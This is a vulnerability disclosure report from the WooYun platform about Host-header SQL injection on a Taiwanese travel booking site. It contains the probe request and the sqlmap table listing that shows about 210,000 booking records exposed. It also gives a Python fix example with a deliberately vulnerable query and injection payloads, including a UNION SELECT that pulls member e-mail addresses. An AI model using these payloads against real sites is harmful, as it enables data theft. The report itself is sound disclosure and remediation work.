Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2015-0160756

Title: SQL injection via the Host header on a Via`s旅行札記 site (210,000 room booking records exposed) (Taiwan region)

Vendor: Via`s旅行札記

Author: Xmyth_夏洛克

Submitted: 2015-12-13 13:22

Fixed: 2016-01-28 17:10

Published: 2016-01-28 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner (the Hitcon Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-12-13: details sent to the vendor, awaiting vendor response
2015-12-15: vendor confirmed; details visible to the vendor only
2015-12-25: details opened to core white hats and domain experts
2016-01-04: details opened to regular white hats
2016-01-14: details opened to trainee white hats
2016-01-28: details opened to the public

Brief description:

As the title says.

Detailed description:

URL with the injection: **.**.**.**

(screenshot: 站点.png)


The Host header value is not filtered properly before reaching the database, so it is injectable: appending a single quote to the Host header makes the page return a database error.

(screenshot: 报错.png)


GET / HTTP/1.1
Host: **.**.**.***
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=vm20qfgod5rip11vqov3aa1hf2; _ga=GA1.2.584452688.1449899997; __auc=6d2d15a715194c6a3ffdf53d737; __asc=bbd94a3d151950132912ef7677c; __utma=138364462.1515349163.1449903864.1449903864.1449903864.1; __utmb=138364462; __utmc=138364462; __utmz=138364462.1449903864.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Connection: keep-alive


Feeding the request above into sqlmap confirmed that the injection is exploitable.

(screenshot: 注入点.png)

Proof of vulnerability:

Databases involved

(screenshot: dbs.png)


A large amount of sensitive data is exposed; the room booking table alone holds about 210,000 rows (w_room_order2: 214,747 entries). Row counts per table, as reported by sqlmap:
Database: gogoblog
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| w_order2_confirm | 736451 |
| calendar | 390254 |
| w_counterrecord | 331236 |
| w_room_order2 | 214747 |
| w_guestbook | 56649 |
| w_club_todaycount | 49001 |
| w_sign_confirm | 13291 |
| w_room_order | 11696 |
| blog_myfriendlog | 9221 |
| syslog201412 | 5473 |
| syslog201409 | 5214 |
| syslog201501 | 5173 |
| syslog201503 | 5162 |
| syslog201410 | 5155 |
| syslog201408 | 5107 |
| syslog201407 | 5094 |
| syslog201505 | 5046 |
| syslog201504 | 5004 |
| syslog201411 | 4919 |
| syslog201507 | 4757 |
| syslog201502 | 4732 |
| gallery_images | 4649 |
| w_room_comment | 4587 |
| syslog201506 | 4579 |
| syslog201510 | 4463 |
| syslog201508 | 4394 |
| w_clean_list | 4343 |
| syslog201406 | 4253 |
| syslog201509 | 4185 |
| syslog201403 | 4183 |
| syslog201405 | 4139 |
| syslog201511 | 4139 |
| syslog201404 | 4070 |
| syslog201210 | 4055 |
| w_guestbook_itravel | 4008 |
| syslog201401 | 3895 |
| syslog201308 | 3838 |
| syslog201307 | 3833 |
| syslog201312 | 3794 |
| syslog201402 | 3779 |
| syslog201209 | 3737 |
| w_pay | 3598 |
| syslog201206 | 3571 |
| syslog201310 | 3557 |
| syslog201309 | 3539 |
| syslog201311 | 3520 |
| syslog201212 | 3488 |
| syslog201207 | 3464 |
| syslog201208 | 3395 |
| syslog201211 | 3381 |
| syslog201304 | 3366 |
| syslog201306 | 3362 |
| syslog201305 | 3296 |
| syslog201303 | 3279 |
| syslog201108 | 3255 |
| syslog201202 | 3245 |
| syslog201201 | 3138 |
| syslog201301 | 3116 |
| w_guestbook_m | 3052 |
| syslog201302 | 3045 |
| syslog201107 | 3032 |
| syslog201112 | 2976 |
| syslog201111 | 2772 |
| syslog201110 | 2615 |
| syslog201203 | 2584 |
| syslog201204 | 2582 |
| syslog201109 | 2578 |
| syslog201205 | 2561 |
| w_blog_board | 2310 |
| m_list | 2304 |
| syslog201104 | 2148 |
| syslog201106 | 1884 |
| syslog201103 | 1819 |
| syslog201512 | 1777 |
| syslog201101 | 1772 |
| syslog201105 | 1742 |
| syslog201102 | 1538 |
| syslog201001 | 1533 |
| syslog201012 | 1421 |
| syslog201008 | 1402 |
| syslog201011 | 1361 |
| syslog201009 | 1273 |
| syslog201010 | 1239 |
| syslog201007 | 1234 |
| syslog200912 | 1223 |
| w_push_blog | 1203 |
| syslog201006 | 1181 |
| syslog201003 | 1156 |
| syslog201005 | 1134 |
| w_product_attrib | 1085 |
| syslog201004 | 1058 |
| syslog201002 | 1053 |
| syslog200910 | 1046 |
| syslog200911 | 1024 |
| w_blog_mailto | 886 |
| w_bloglist | 864 |
| w_push_room | 803 |
| room_class | 746 |
| syslog200908 | 724 |
| syslog200909 | 704 |
| news | 674 |
| photo_class | 477 |
| w_blog_extend | 442 |
| w_travel_point | 410 |
| syslog200907 | 381 |
| postal_zone | 337 |
| w_push_news | 294 |
| w_member | 292 |
| w_ordertitles | 263 |
| w_product | 257 |
| w_blogcategory | 162 |
| w_travelmap | 154 |
| w_ordermain | 146 |
| w_work_list | 127 |
| w_product_board | 123 |
| w_room_blacklist | 116 |
| w_contact | 95 |
| w_link | 83 |
| news_bar | 69 |
| room_class_type | 61 |
| w_category | 60 |
| w_travel_club | 53 |
| B2_pro | 52 |
| w_travel_club_itravel | 51 |
| w_clean_price2015 | 48 |
| w_web_config | 48 |
| w_clean_price | 47 |
| w_travel_content | 45 |
| L2 | 44 |
| w_travel_content_mobile | 43 |
| w_blog_bulletin | 41 |
| club_shop_explain | 36 |
| w_adver | 35 |
| w_room_price | 35 |
| w_travel_club2 | 35 |
| w_shop_pay | 32 |
| w_system | 32 |
| w_class | 30 |
| w_shop_explain | 30 |
| w_system_v1 | 30 |
| w_system_v2 | 30 |
| bulletin | 29 |
| w_travel_club_holiday | 29 |
| w_pointcategory | 28 |
| w_shop_pay_mobile | 28 |
| w_travelmap_extend | 27 |
| website_config | 27 |
| w_shop_explain_mobile | 26 |
| w_job | 24 |
| w_hotel_explain | 23 |
| C2 | 22 |
| shopping_item | 22 |
| w_system_v3 | 20 |
| w_upload_image | 20 |
| w_bookmark_city | 19 |
| w_order_mailto | 19 |
| w_blog_myfriend | 18 |
| L1 | 17 |
| L1_pro | 17 |
| L2_pro | 17 |
| C1 | 16 |
| w_payment | 15 |
| w_system_85inn | 14 |
| w_favorite | 12 |
| B1_pro | 11 |
| w_top_product | 11 |
| w_qa_list | 10 |
| w_web_service | 10 |
| w_forum_board_re | 9 |
| question_n1 | 8 |
| w_forum_board | 8 |
| w_service_list | 8 |
| room_weed | 7 |
| w_company | 7 |
| w_travel_club_m | 7 |
| room_states_i | 6 |
| room_states_i2 | 6 |
| w_agreement | 6 |
| w_edu | 6 |
| w_income | 6 |
| w_order_agreement | 6 |
| w_shop_freightage | 6 |
| room_states | 5 |
| w_blogcategory2 | 5 |
| w_product_explain | 5 |
| w_qa | 5 |
| w_auth | 4 |
| w_bookmark | 4 |
| w_carrer | 4 |
| w_shop_privacy | 4 |
| w_shop_return | 4 |
| w_theme | 4 |
| food_class | 3 |
| w_multi_map | 3 |
| w_paynow_payment | 3 |
| question_vote_record | 2 |
| w_active | 2 |
| w_bookmark_board | 2 |
| w_guestbook2_m | 2 |
| w_order_mail_content | 2 |
| w_travel_board | 2 |
| w_travel_club_85love | 2 |
| weblog201501 | 2 |
| club_shop_explain2 | 1 |
| question | 1 |
| w_adver_m | 1 |
| w_auth_passwd | 1 |
| w_food_explain | 1 |
| w_hotel_explain2 | 1 |
| w_pcount | 1 |
| w_users | 1 |
| w_vote | 1 |
| weblog201201 | 1 |
+-------------------------+---------+

(screenshot: 数据.png)

Fix recommendation:

Never concatenate the Host header (or any other request header) into SQL text. Bind the value as a query parameter, and validate Host against an allowlist of the hostnames the site actually serves, rejecting any request whose Host does not match.
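The defect described in the detailed description (a Host header value spliced into a SQL string, so that a single quote produces a database error and a crafted value rewrites the query) and the fix recommended above, worked through as an added example. This is not code from the affected site: the tables and columns are a constructed stand-in for whatever per-host lookup the real site performs (its schema is known only by table name from the sqlmap output), and ALLOWED_HOSTS with the example.tw hostnames is an assumption about the deployment.

```python
"""Host-header SQL injection: the reported defect beside a hardened version.

Added example, not code from the affected site.  The tables and columns are a
constructed stand-in (the real schema is known only by table name from the
sqlmap output); ALLOWED_HOSTS and the example.tw hostnames are assumptions.
"""
import sqlite3

# Assumed: the hostnames this deployment legitimately serves.
ALLOWED_HOSTS = {"www.example.tw", "blog.example.tw"}


def make_db():
    """Constructed in-memory database: a per-host config table plus a table
    holding data an attacker would want (members' e-mail addresses)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE w_web_config (host TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO w_web_config VALUES (?, ?)",
        [("www.example.tw", "Main site"), ("blog.example.tw", "Travel blog")],
    )
    conn.execute("CREATE TABLE w_member (id INTEGER, email TEXT)")
    conn.execute("INSERT INTO w_member VALUES (1, 'alice@example.tw')")
    return conn


def lookup_site_vulnerable(conn, host_header):
    """The reported bug: the raw Host header is spliced into the SQL text.
    A single quote breaks the statement; a crafted value rewrites it."""
    sql = "SELECT title FROM w_web_config WHERE host = '%s'" % host_header
    return [row[0] for row in conn.execute(sql)]


def lookup_site_hardened(conn, host_header):
    """Fix: normalise the header, refuse anything not in the allowlist, and
    bind the value as a parameter so it can never become SQL syntax."""
    host = host_header.split(":", 1)[0].strip().lower()   # drop an optional :port
    if host not in ALLOWED_HOSTS:
        raise ValueError("unexpected Host header: %r" % host_header)
    cur = conn.execute("SELECT title FROM w_web_config WHERE host = ?", (host,))
    return [row[0] for row in cur]


def run_lookup(conn, lookup, host_header):
    """Classify the outcome of one Host value: the rows returned, a database
    error (the tester's single-quote probe), or rejection by the allowlist."""
    try:
        return lookup(conn, host_header)
    except sqlite3.OperationalError:
        return "db-error"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    db = make_db()
    probes = [
        "www.example.tw",                          # legitimate request
        "www.example.tw'",                         # the quote probe from the report
        "x' UNION SELECT email FROM w_member--",   # pulls another table's data
    ]
    for probe in probes:
        print("%-42r vulnerable=%r hardened=%r" % (
            probe,
            run_lookup(db, lookup_site_vulnerable, probe),
            run_lookup(db, lookup_site_hardened, probe),
        ))
```

Against the vulnerable lookup the quote probe yields a database error and the UNION value returns a row from w_member, which is the pair of behaviours a tester (or sqlmap) uses to confirm and then exploit the injection. The hardened lookup rejects both before the database is touched, while still accepting a legitimate Host that carries a port suffix or different letter case.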

Copyright notice: reproduction must credit Xmyth_夏洛克@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed at: 2015-12-15 03:38

Vendor reply:

Thank you for the report.

Latest status:

None yet